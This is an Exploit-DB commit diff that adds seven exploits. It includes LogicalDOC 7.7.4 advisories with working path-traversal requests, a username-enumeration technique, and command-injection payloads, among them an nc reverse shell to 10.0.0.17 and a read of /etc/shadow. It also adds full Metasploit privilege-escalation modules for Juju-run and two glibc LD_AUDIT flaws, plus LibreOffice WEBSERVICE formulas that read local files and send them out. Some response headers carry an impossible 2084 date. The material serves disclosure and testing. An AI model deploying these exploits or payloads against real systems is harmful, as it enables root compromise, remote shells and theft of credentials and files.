DB: 2018-02-13

7 changes to exploits/shellcodes

Juju-run Agent - Privilege Escalation (Metasploit)
glibc - '$ORIGIN' Expansion Privilege Escalation (Metasploit)
glibc - 'LD_AUDIT' Arbitrary DSO Load Privilege Escalation (Metasploit)

LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure
LogicalDOC Enterprise 7.7.4 - Directory Traversal
LogicalDOC Enterprise 7.7.4 - User Enumeration
LogicalDOC Enterprise 7.7.4 - Root Remote Code Execution
This commit is contained in:
Offensive Security 2018-02-13 05:01:51 +00:00
parent afff66a166
commit 7b401481a2
8 changed files with 1316 additions and 0 deletions

View file

@ -0,0 +1,111 @@
LogicalDOC Enterprise 7.7.4 Multiple Directory Traversal Vulnerabilities
Vendor: LogicalDOC Srl
Product web page: https://www.logicaldoc.com
Affected version: 7.7.4
7.7.3
7.7.2
7.7.1
7.6.4
7.6.2
7.5.1
7.4.2
7.1.1
Summary: LogicalDOC is a free document management system that is designed
to handle and share documents within an organization. LogicalDOC is a content
repository, with Lucene indexing, Activiti workflow, and a set of automatic
import procedures.
Desc: The application suffers from multiple post-auth file disclosure vulnerability
when input passed thru the 'suffix' and 'fileVersion' parameters is not properly
verified before being used to include files. This can be exploited to read arbitrary
files from local resources with directory traversal attacks.
Tested on: Microsoft Windows 10
Linux Ubuntu 16.04
Java 1.8.0_161
Apache-Coyote/1.1
Apache Tomcat/8.5.24
Apache Tomcat/8.5.13
Undisclosed 8.41
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5450
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5450.php
26.01.2018
---
PoC #1:
GET /thumbnail?docId=3375114&random=1517220341243&suffix=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1
Host: localhost:8080
Response:
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo
PoC #2:
GET /convertpdf?docId=2450&control=preview&fileVersion=../../../../../../etc/passwd HTTP/1.1
Host: localhozt:8080
Response:
HTTP/1.1 200
Cache-Control: must-revalidate, post-check=0,pre-check=0
Expires: 0
Content-Disposition: attachment; filename="=?UTF-8?B?MDkyMDEyMzEwNTVTUFQgMDA0LnBkZi5wZGY=?="
Pragma: public
Content-Type: application/pdf;charset=UTF-8
Content-Length: 964
Date: Mon, 05 Feb 2018 21:30:59 GMT
Connection: close
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:100:sync:/bin:/bin/sync
games:x:5:100:games:/usr/games:/bin/sh
...
...

View file

@ -0,0 +1,86 @@
LogicalDOC Enterprise 7.7.4 Username Enumeration Weakness
Vendor: LogicalDOC Srl
Product web page: https://www.logicaldoc.com
Affected version: 7.7.4
7.7.3
7.7.2
7.7.1
7.6.4
7.6.2
7.5.1
7.4.2
7.1.1
Summary: LogicalDOC is a free document management system that is designed
to handle and share documents within an organization. LogicalDOC is a content
repository, with Lucene indexing, Activiti workflow, and a set of automatic
import procedures.
Desc: The weakness is caused due to the 'j_spring_security_check' script
and how it verifies provided credentials. Attacker can use this weakness
to enumerate valid users on the affected node.
Tested on: Microsoft Windows 10
Linux Ubuntu 16.04
Java 1.8.0_161
Apache-Coyote/1.1
Apache Tomcat/8.5.24
Apache Tomcat/8.5.13
Undisclosed 8.41
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5451
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5451.php
26.01.2018
--
Request/response for existent username:
---------------------------------------
POST /j_spring_security_check HTTP/1.1
Host: 192.168.1.74:8080
j_username=admin&j_password=123123&j_successurl=%2Ffrontend.jsp&j_failureurl=%2Flogin.jsp
--
HTTP/1.1 302
Set-Cookie: ldoc-failure=wrongpassword
Location: //login.jsp?failure=wrongpassword
Content-Length: 0
Date: Tue, 06 Feb 2084 19:42:15 GMT
Connection: close
Request/response for non-existent username:
-------------------------------------------
POST /j_spring_security_check HTTP/1.1
Host: 192.168.1.74:8080
j_username=n00b&j_password=123123&j_successurl=%2Ffrontend.jsp&j_failureurl=%2Flogin.jsp
--
HTTP/1.1 500
Set-Cookie: JSESSIONID=F06F1D03E249D90802AFE92428DBBEDD; Path=/; Secure; HttpOnly
Content-Type: text/html;charset=UTF-8
Content-Length: 78
Date: Tue, 06 Feb 2084 19:57:14 GMT
Connection: close
<html>
<body>
<div><br/><br/><strong>ERROR</strong></div>
</body>
<html>

View file

@ -0,0 +1,103 @@
LogicalDOC Enterprise 7.7.4 Post-Auth Command Execution Via Binary Path Manipulation
Vendor: LogicalDOC Srl
Product web page: https://www.logicaldoc.com
Affected version: 7.7.4
7.7.3
7.7.2
7.7.1
7.6.4
7.6.2
7.5.1
7.4.2
7.1.1
Summary: LogicalDOC is a free document management system that is designed
to handle and share documents within an organization. LogicalDOC is a content
repository, with Lucene indexing, Activiti workflow, and a set of automatic
import procedures.
Desc: LogicalDOC suffers from multiple authenticated OS command execution
vulnerabilities by manipulating the path of the many binaries included in the
package when changing the settings with their respected arguments. This can be
exploited to execute local root privilege escalation attack and/or inject and
execute arbitrary system commands as the root or SYSTEM user depending on the
platform affected.
Tested on: Microsoft Windows 10
Linux Ubuntu 16.04
Java 1.8.0_161
Apache-Coyote/1.1
Apache Tomcat/8.5.24
Apache Tomcat/8.5.13
Undisclosed 8.41
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5452
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5452.php
26.01.2018
After saving the settings, the command will be executed whenever a user uploads a file
that was inserted in the 'default.antivirus.includes' list. PoC for antivirus.command:
--------------------------------------------------------------------------------------
POST /frontend/setting HTTP/1.1
Host: localhost:8080
Connection: keep-alive
Content-Length: 594
X-GWT-Module-Base: http://localhost:8080/frontend/
X-GWT-Permutation: 87C7268A2BDB185A47D161B6D6D2DEE8
Origin: http://localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 OPR/50.0.2762.67
Content-Type: text/x-gwt-rpc; charset=UTF-8
Accept: */*
Referer: http://localhost:8080/frontend.jsp?docId=3735554
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: GLog=%7B%0A%20%20%20%20trackRPC%3Afalse%0A%7D; JSESSIONID=FCFD7719139A634C8411FD081780BE2A; ldoc-sid=5dd1ea28-36a0-4967-bdd8-2556d16101d7
7|0|16|http://localhost:8080/frontend/|2B4A04609097A6274DA6D61C469E4E6B|com.logicaldoc.gui.frontend.client.services.SettingService|saveSettings|[Lcom.logicaldoc.gui.common.client.beans.GUIParameter;/1603922774|com.logicaldoc.gui.common.client.beans.GUIParameter/3041767606|default.antivirus.enabled|true|default.antivirus.excludes|*.tif,*.tiff,*.jpg,*.jpeg,*.png,*.bmp,*.gif,*.txt,*.iso|default.antivirus.includes|*.exe,*.com,*.pif,*.scr,*.dll,*.tar.gz|default.antivirus.timeout|0|antivirus.command|c:\\windows\\system32\\calc.exe|1|2|3|4|1|5|5|5|6|0|7|8|6|0|9|10|6|0|11|12|6|0|13|14|6|0|15|16|
PoC for call home reverse shell via ocr.Tesseract.path:
-------------------------------------------------------
POST /frontend/setting HTTP/1.1
Host: localhost:8080
7|0|25|https://localhost:8080/frontend/|2B4A04609097A6274DA6D61C469E4E6B|com.logicaldoc.gui.frontend.client.services.SettingService|saveSettings|[Lcom.logicaldoc.gui.common.client.beans.GUIParameter;/1603922774|com.logicaldoc.gui.common.client.beans.GUIParameter/3041767606|default.ocr.includes|*.pdf,*.tif,*.png,*.jpg,*.txt|default.ocr.excludes|*.odt|default.ocr.text.threshold|1|default.ocr.resolution.threshold|400|ocr.timeout|90|ocr.rendres|180|ocr.rendres.barcode|ocr.batch|2|ocr.engine|Tesseract|ocr.Tesseract.path|nc -c /bin/sh 10.0.0.17 4444|1|2|3|4|1|5|5|10|6|0|7|8|6|0|9|10|6|0|11|12|6|0|13|14|6|0|15|16|6|0|17|18|6|0|19|18|6|0|20|21|6|0|22|23|6|0|24|25|
PoC for Key Store via OpenSSL path:
-----------------------------------
POST /frontend/sign HTTP/1.1
Host: localhost:8080
7|0|14|https://localhost:8080/frontend/|16A5065211C47142C5282B2BC4600F1D|com.logicaldoc.gui.frontend.client.services.SignService|generateNewKeystore|com.logicaldoc.gui.common.client.beans.GUIKeystore/3815185030|java.util.Date/3385151746|1337|/usr/bin/openssl && /usr/bin/cat /etc/shadow|root|O=ZSL,OU=JXY,C=MK|123|#000000|$PAGE_WIDTH/6|5|1|2|3|4|1|5|5|6|WFn2zQZ|A|7|8|9|10|0|11|12|60|100|0|13|14|14|B|2|
PoC for clients and external apps and services path via command.convert, command.gs, command.openssl, command.pdftohtml, command.keytool:
-----------------------------------------------------------------------------------------------------------------------------------------
POST /frontend/setting HTTP/1.1
Host: localhost:8080
7|0|35|https://localhost:8080/frontend/|2B4A04609097A6274DA6D61C469E4E6B|com.logicaldoc.gui.frontend.client.services.SettingService|saveSettings|[Lcom.logicaldoc.gui.common.client.beans.GUIParameter;/1603922774|com.logicaldoc.gui.common.client.beans.GUIParameter/3041767606|webservice.enabled|true|webdav.enabled|webdav.usecache|false|command.convert|/usr/bin/whoami > test.txt|command.gs|/usr/bin/gs|command.openssl|/usr/bin/openssl|command.pdftohtml|/usr/bin/pdftohtml|command.keytool|1337|cmis.enabled|cmis.changelog|cmis.maxitems|200|default.extcall.enabled|default.extcall.name|External Call|default.extcall.baseurl||default.extcall.suffix|default.extcall.window|_blank|default.extcall.params|user|1|2|3|4|1|5|5|17|6|0|7|8|6|0|9|8|6|0|10|11|6|0|12|13|6|0|14|15|6|0|16|17|6|0|18|19|6|0|20|21|6|0|22|8|6|0|23|8|6|0|24|25|6|0|26|11|6|0|27|28|6|0|29|30|6|0|31|30|6|0|32|33|6|0|34|35|

132
exploits/linux/local/44023.rb Executable file
View file

@ -0,0 +1,132 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Juju-run Agent Privilege Escalation',
'Description' => %q{
This module attempts to gain root privileges on Juju agent systems
running the juju-run agent utility.
Juju agent systems running agent tools prior to version 1.25.12,
2.0.x before 2.0.4, and 2.1.x before 2.1.3, provide a UNIX domain socket
to manage software ("units") without setting appropriate permissions,
allowing unprivileged local users to execute arbitrary commands as root.
This module has been tested successfully with Juju agent tools versions
1.18.4, 1.25.5 and 1.25.9 on Ubuntu 14.04.1 LTS x86 deployed by Juju
1.18.1-trusty-amd64 and 1.25.6-trusty-amd64 on Ubuntu 14.04.1 LTS x86_64.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Ryan Beisner', # Discovery and PoC
'David Ames (@thedac)', # Discovery and PoC
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
],
'DisclosureDate' => 'Apr 13 2017',
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [[ 'Auto', {} ]],
'References' =>
[
[ 'CVE', '2017-9232' ],
[ 'BID', '98737' ],
[ 'URL', 'https://bugs.launchpad.net/juju/+bug/1682411' ]
]
))
register_options(
[
OptString.new('UNIT', [ false, 'A valid Juju unit name', '' ]),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
])
end
def check
juju_run_path = cmd_exec 'which juju-run'
if juju_run_path.start_with? '/'
vprint_good 'juju-run is installed'
return CheckCode::Detected
end
vprint_error 'juju-run is NOT installed'
CheckCode::Safe
end
def unit_names
units = []
cmd_exec('/bin/ls -m /var/log/juju/*.log').chomp.split(/,\s*/).each do |log|
units << ::File.basename(log).gsub(/\.log$/, '')
end
cmd_exec('/bin/ls -m /var/lib/juju/agents/').chomp.split(/,\s*/).each do |agent|
units << ::File.basename(agent)
end
units.uniq
end
def execute_command(cmd, opts = {})
cmd_exec "juju-run #{opts['unit']} '#{cmd}'"
end
def upload_and_chmodx(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
cmd_exec "chmod +x '#{path}'"
register_file_for_cleanup path
end
def exploit
if check != CheckCode::Detected
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end
units = datastore['UNIT'].blank? ? unit_names : [ datastore['UNIT'] ]
if units.empty?
fail_with Failure::Unknown, "Could not find any Juju units. Try specifying a 'UNIT'"
end
# Check each unit for a privileged socket
print_status "Trying #{units.size} units..."
socket_unit = nil
unit_names.each do |unit|
id = execute_command 'id', 'unit' => unit
if id.include? 'root'
print_good "Unit #{unit.inspect} uses a privileged socket"
socket_unit = unit
break
end
end
if socket_unit.nil?
fail_with Failure::NotVulnerable, 'Could not find any Juju units using a privileged socket'
end
# Upload payload executable
payload_name = ".#{rand_text_alphanumeric rand(5..10)}"
payload_path = "#{datastore['WritableDir']}/#{payload_name}"
upload_and_chmodx payload_path, generate_payload_exe
# Execute payload executable
vprint_status 'Executing payload...'
execute_command payload_path, 'unit' => socket_unit
end
end

232
exploits/linux/local/44024.rb Executable file
View file

@ -0,0 +1,232 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/exploit/local/linux'
require 'msf/core/exploit/exe'
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Msf::Exploit::Local::Linux
def initialize(info = {})
super(update_info(info,
'Name' => "glibc '$ORIGIN' Expansion Privilege Escalation",
'Description' => %q{
This module attempts to gain root privileges on Linux systems by abusing
a vulnerability in the GNU C Library (glibc) dynamic linker.
glibc ld.so in versions before 2.11.3, and 2.12.x before 2.12.2 does not
properly restrict use of the LD_AUDIT environment variable when loading
setuid executables which allows control over the $ORIGIN library search
path resulting in execution of arbitrary shared objects.
This module opens a file descriptor to the specified suid executable via
a hard link, then replaces the hard link with a shared object before
instructing the linker to execute the file descriptor, resulting in
arbitrary code execution.
The specified setuid binary must be readable and located on the same
file system partition as the specified writable directory.
This module has been tested successfully on glibc version 2.5 on CentOS
5.4 (x86_64), 2.5 on CentOS 5.5 (x86_64) and 2.12 on Fedora 13 (i386).
RHEL 5 is reportedly affected, but untested. Some versions of ld.so,
such as the version shipped with Ubuntu 14, hit a failed assertion
in dl_open_worker causing exploitation to fail.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Tavis Ormandy', # Discovery and exploit
'Brendan Coles' # Metasploit
],
'DisclosureDate' => 'Oct 18 2010',
'Platform' => 'linux',
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' =>
[
[ 'Automatic', { } ],
[ 'Linux x86', { 'Arch' => ARCH_X86 } ],
[ 'Linux x64', { 'Arch' => ARCH_X64 } ]
],
'DefaultTarget' => 0,
'References' =>
[
[ 'CVE', '2010-3847' ],
[ 'BID', '44154' ],
[ 'EDB', '15274' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2010/Oct/257' ],
[ 'URL', 'https://www.ubuntu.com/usn/usn-1009-1' ],
[ 'URL', 'https://security-tracker.debian.org/tracker/CVE-2010-3847' ],
[ 'URL', 'https://access.redhat.com/security/cve/CVE-2010-3847' ]
]
))
register_options(
[
OptString.new('SUID_EXECUTABLE', [ true, 'Path to a suid executable', '/bin/ping' ]),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
])
end
def base_dir
datastore['WritableDir']
end
def suid_exe_path
datastore['SUID_EXECUTABLE']
end
def check
glibc_banner = cmd_exec 'ldd --version'
glibc_version = Gem::Version.new glibc_banner.scan(/^ldd\s+\(.*\)\s+([\d\.]+)/).flatten.first
if glibc_version.eql? ''
vprint_error 'Could not determine the GNU C library version'
return CheckCode::Safe
elsif glibc_version >= Gem::Version.new('2.12.2') ||
(glibc_version >= Gem::Version.new('2.11.3') && glibc_version < Gem::Version.new('2.12'))
vprint_error "GNU C Library version #{glibc_version} is not vulnerable"
return CheckCode::Safe
end
vprint_good "GNU C Library version #{glibc_version} is vulnerable"
unless setuid? suid_exe_path
vprint_error "#{suid_exe_path} is not setuid"
return CheckCode::Detected
end
vprint_good "#{suid_exe_path} is setuid"
unless cmd_exec("test -r #{suid_exe_path} && echo true").include? 'true'
vprint_error("#{suid_exe_path} is not readable")
return CheckCode::Detected
end
vprint_good "#{suid_exe_path} is readable"
CheckCode::Appears
end
def upload_and_chmodx(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
cmd_exec "chmod +x '#{path}'"
register_file_for_cleanup path
end
def exploit
check_status = check
if check_status == CheckCode::Appears
print_good 'The target appears to be vulnerable'
elsif check_status == CheckCode::Detected
fail_with Failure::BadConfig, "#{suid_exe_path} is not suid or not readable"
else
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end
suid_partition = cmd_exec "df -P -- '#{suid_exe_path}' | awk 'NR==2 {print $1}'"
base_partition = cmd_exec "df -P -- '#{base_dir}' | awk 'NR==2 {print $1}'"
if suid_partition == base_partition
vprint_good "'#{suid_exe_path}' and '#{base_dir}' are located on the same partition"
else
print_warning "'#{suid_exe_path}' and '#{base_dir}' are not located on the same partition"
end
payload_name = ".#{rand_text_alphanumeric rand(5..10)}"
payload_path = "#{base_dir}/#{payload_name}"
# Set target
uname = cmd_exec 'uname -m'
vprint_status "System architecture is #{uname}"
if target.name.eql? 'Automatic'
case uname
when 'x86_64'
my_target = targets[2]
when /x86/, /i\d86/
my_target = targets[1]
else
fail_with Failure::NoTarget, 'Unable to automatically select a target'
end
else
my_target = target
end
print_status "Using target: #{my_target.name}"
cpu = nil
case my_target['Arch']
when ARCH_X86
cpu = Metasm::Ia32.new
when ARCH_X64
cpu = Metasm::X86_64.new
else
fail_with Failure::NoTarget, 'Target is not compatible'
end
# Compile shared object
so_stub = %|
extern int setuid(int);
extern int setgid(int);
extern int system(const char *__s);
void init(void) __attribute__((constructor));
void __attribute__((constructor)) init() {
setuid(0);
setgid(0);
system("#{payload_path}");
}
|
begin
so = Metasm::ELF.compile_c(cpu, so_stub).encode_string(:lib)
rescue
print_error "Metasm encoding failed: #{$ERROR_INFO}"
elog "Metasm encoding failed: #{$ERROR_INFO.class} : #{$ERROR_INFO}"
elog "Call stack:\n#{$ERROR_INFO.backtrace.join "\n"}"
fail_with Failure::Unknown, 'Metasm encoding failed'
end
# Upload shared object
so_name = ".#{rand_text_alphanumeric rand(5..10)}"
so_path = "#{base_dir}/#{so_name}"
upload_and_chmodx so_path, so
# Upload exploit
link_name = ".#{rand_text_alphanumeric rand(5..10)}"
link_path = "#{base_dir}/#{link_name}"
fd = rand(10..200)
exp = %(
rm -rf '#{link_path}'
mkdir '#{link_path}'
ln #{suid_exe_path} #{link_path}/#{link_name}
exec #{fd}< #{link_path}/#{link_name}
ls -l /proc/$$/fd/#{fd}
rm -rf '#{link_path}'
ls -l /proc/$$/fd/#{fd}
mv #{so_path} #{link_path}
LD_AUDIT="\\$ORIGIN" exec /proc/self/fd/#{fd}
)
exp_name = ".#{rand_text_alphanumeric rand(5..10)}"
exp_path = "#{base_dir}/#{exp_name}"
upload_and_chmodx exp_path, exp
register_file_for_cleanup link_path
# Upload payload
upload_and_chmodx payload_path, generate_payload_exe
# Launch exploit
print_status 'Launching exploit...'
# The echo at the end of the command is required
# else the original session may die
output = cmd_exec "#{exp_path}& echo "
output.each_line { |line| vprint_status line.chomp }
end
end

249
exploits/linux/local/44025.rb Executable file
View file

@ -0,0 +1,249 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/exploit/local/linux'
require 'msf/core/exploit/exe'
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Msf::Exploit::Local::Linux
def initialize(info = {})
super(update_info(info,
'Name' => 'glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation',
'Description' => %q{
This module attempts to gain root privileges on Linux systems by abusing
a vulnerability in the GNU C Library (glibc) dynamic linker.
glibc ld.so in versions before 2.11.3, and 2.12.x before 2.12.2 does not
properly restrict use of the LD_AUDIT environment variable when loading
setuid executables. This allows loading arbitrary shared objects from
the trusted library search path with the privileges of the suid user.
This module uses LD_AUDIT to load the libpcprofile.so shared object,
distributed with some versions of glibc, and leverages arbitrary file
creation functionality in the library constructor to write a root-owned
world-writable file to a system trusted search path (usually /lib).
The file is then overwritten with a shared object then loaded with
LD_AUDIT resulting in arbitrary code execution.
This module has been tested successfully on glibc version 2.11.1 on
Ubuntu 10.04 x86_64 and version 2.7 on Debian 5.0.4 i386.
RHEL 5 is reportedly affected, but untested. Some glibc distributions
do not contain the libpcprofile.so library required for successful
exploitation.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Tavis Ormandy', # Discovery and exploit
'zx2c4', # "I Can't Read and I Won't Race You Either" exploit
'Marco Ivaldi', # raptor_ldaudit and raptor_ldaudit2 exploits
'Todor Donev', # libmemusage.so exploit
'Brendan Coles' # Metasploit
],
'DisclosureDate' => 'Oct 18 2010',
'Platform' => 'linux',
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' =>
[
[ 'Automatic', { } ],
[ 'Linux x86', { 'Arch' => ARCH_X86 } ],
[ 'Linux x64', { 'Arch' => ARCH_X64 } ]
],
'DefaultTarget' => 0,
'References' =>
[
[ 'CVE', '2010-3847' ],
[ 'CVE', '2010-3856' ],
[ 'BID', '44154' ],
[ 'BID', '44347' ],
[ 'EDB', '15274' ],
[ 'EDB', '15304' ],
[ 'EDB', '18105' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2010/Oct/257' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2010/Oct/344' ],
[ 'URL', 'https://www.ubuntu.com/usn/usn-1009-1' ],
[ 'URL', 'https://security-tracker.debian.org/tracker/CVE-2010-3847' ],
[ 'URL', 'https://security-tracker.debian.org/tracker/CVE-2010-3856' ],
[ 'URL', 'https://access.redhat.com/security/cve/CVE-2010-3847' ],
[ 'URL', 'https://access.redhat.com/security/cve/CVE-2010-3856' ]
]
))
register_options(
[
OptString.new('SUID_EXECUTABLE', [ true, 'Path to a SUID executable', '/bin/ping' ]),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
])
end
def base_dir
datastore['WritableDir']
end
def suid_exe_path
datastore['SUID_EXECUTABLE']
end
def check
glibc_banner = cmd_exec 'ldd --version'
glibc_version = Gem::Version.new glibc_banner.scan(/^ldd\s+\(.*\)\s+([\d\.]+)/).flatten.first
if glibc_version.to_s.eql? ''
vprint_error 'Could not determine the GNU C library version'
return CheckCode::Safe
elsif glibc_version >= Gem::Version.new('2.12.2') ||
(glibc_version >= Gem::Version.new('2.11.3') && glibc_version < Gem::Version.new('2.12'))
vprint_error "GNU C Library version #{glibc_version} is not vulnerable"
return CheckCode::Safe
end
vprint_good "GNU C Library version #{glibc_version} is vulnerable"
lib = 'libpcprofile.so'
@lib_dir = nil
vprint_status "Checking for #{lib} in system search paths"
search_paths = cmd_exec "env -i LD_PRELOAD=#{rand_text_alpha rand(10..15)} LD_DEBUG=libs env 2>&1 | grep 'search path='"
search_paths.split('path=')[1..-1].join.split(':').each do |path|
lib_dir = path.to_s.strip
next if lib_dir.eql? ''
libs = cmd_exec "ls '#{lib_dir}'"
if libs.include? lib
@lib_dir = lib_dir
break
end
end
if @lib_dir.nil?
vprint_error "Could not find #{lib}"
return CheckCode::Safe
end
vprint_good "Found #{lib} in #{@lib_dir}"
unless setuid? suid_exe_path
vprint_error "#{suid_exe_path} is not setuid"
return CheckCode::Detected
end
vprint_good "#{suid_exe_path} is setuid"
CheckCode::Appears
end
def upload_and_chmodx(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
cmd_exec "chmod +x '#{path}'"
register_file_for_cleanup path
end
def on_new_session(client)
# remove root owned shared object from system load path
if client.type.eql? 'meterpreter'
client.core.use 'stdapi' unless client.ext.aliases.include? 'stdapi'
client.fs.file.rm @so_path
else
client.shell_command_token "rm #{@so_path}"
end
end
def exploit
check_status = check
if check_status == CheckCode::Appears
print_good 'The target appears to be vulnerable'
elsif check_status == CheckCode::Detected
fail_with Failure::BadConfig, "#{suid_exe_path} is not suid"
else
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end
payload_name = ".#{rand_text_alphanumeric rand(5..10)}"
payload_path = "#{base_dir}/#{payload_name}"
# Set target
uname = cmd_exec 'uname -m'
vprint_status "System architecture is #{uname}"
if target.name.eql? 'Automatic'
case uname
when 'x86_64'
my_target = targets[2]
when /x86/, /i\d86/
my_target = targets[1]
else
fail_with Failure::NoTarget, 'Unable to automatically select a target'
end
else
my_target = target
end
print_status "Using target: #{my_target.name}"
cpu = nil
case my_target['Arch']
when ARCH_X86
cpu = Metasm::Ia32.new
when ARCH_X64
cpu = Metasm::X86_64.new
else
fail_with Failure::NoTarget, 'Target is not compatible'
end
# Compile shared object
so_stub = %|
extern int setuid(int);
extern int setgid(int);
extern int system(const char *__s);
void init(void) __attribute__((constructor));
void __attribute__((constructor)) init() {
setuid(0);
setgid(0);
system("#{payload_path}");
}
|
begin
so = Metasm::ELF.compile_c(cpu, so_stub).encode_string(:lib)
rescue
print_error "Metasm encoding failed: #{$ERROR_INFO}"
elog "Metasm encoding failed: #{$ERROR_INFO.class} : #{$ERROR_INFO}"
elog "Call stack:\n#{$ERROR_INFO.backtrace.join "\n"}"
fail_with Failure::Unknown, 'Metasm encoding failed'
end
# Upload shared object
so_name = ".#{rand_text_alphanumeric rand(5..10)}"
so_path = "#{base_dir}/#{so_name}"
upload_and_chmodx so_path, so
# Upload exploit
@so_path = "#{@lib_dir}/#{so_name}.so"
exp = %(
umask 0
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="#{@so_path}" #{suid_exe_path} 2>/dev/null
umask 0022
cat #{so_path} > #{@so_path}
LD_AUDIT="#{so_name}.so" #{suid_exe_path}
echo > #{@so_path}
)
exp_name = ".#{rand_text_alphanumeric rand(5..10)}"
exp_path = "#{base_dir}/#{exp_name}"
upload_and_chmodx exp_path, exp
# Upload payload
upload_and_chmodx payload_path, generate_payload_exe
# Launch exploit
print_status 'Launching exploit...'
# The echo at the end of the command is required
# else the original session may die
output = cmd_exec "#{exp_path}& echo "
output.each_line { |line| vprint_status line.chomp }
end
end

View file

@ -0,0 +1,396 @@
# Vulnerability description
[CVE-2018-6871](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6871)
## First part
LibreOffice supports COM.MICROSOFT.WEBSERVICE function:
https://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4
The function is required to obtain data by URL, usually used as:
=FILTERXML(WEBSERVICE("http://api.openweathermap.org/data/2.5/forecast?q=Copenhagen,dk&mode=xml&units=metric");"number(/weatherdata/forecast/time[2]/temperature/@value)")
In original:
For protocols that are not supported, such as ftp: // or file: //, WEBSERVICE returns the #VALUE! error value.
In LibreOffice, these restrictions are not implemented before 5.4.5/6.0.1.
## Second part
By default the cells are not updated, but if you specify the cell type like ~error, then the cell will be updated when you open document.
# Exploitation
To read file you need just:
=WEBSERVICE("/etc/passwd")
This function can also be used to send a file:
=WEBSERVICE("http://localhost:6000/?q=" & WEBSERVICE("/etc/passwd"))
For successful operation, you need to send the files of the current user, so you need to retrieve current user home path.
=MID(WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")) + 5, SEARCH(CHAR(0), WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")))-FIND("USER=",
Also you can parse other files too, like a ~/.ssh/config or something like that.
For other than LibreOffice Calc formats you just need embed calc object to other document (I checked it works).
# Impact
It is easy to send any files with keys, passwords and anything else. 100% success rate, absolutely silent, affect LibreOffice prior to 5.4.5/6.0.1 in all operation systems (GNU/Linux, MS Windows, macOS etc.) and may be embedded in almost all formats supporting by LO.
# Acknowledgment
Vulnerability was independently found by me (@jollheef) and Ronnie Goodrich && Andrew Krasichkov (according to LibreOffice team notes).
- - -
# poc.fods
```
<?xml version="1.0" encoding="UTF-8"?>
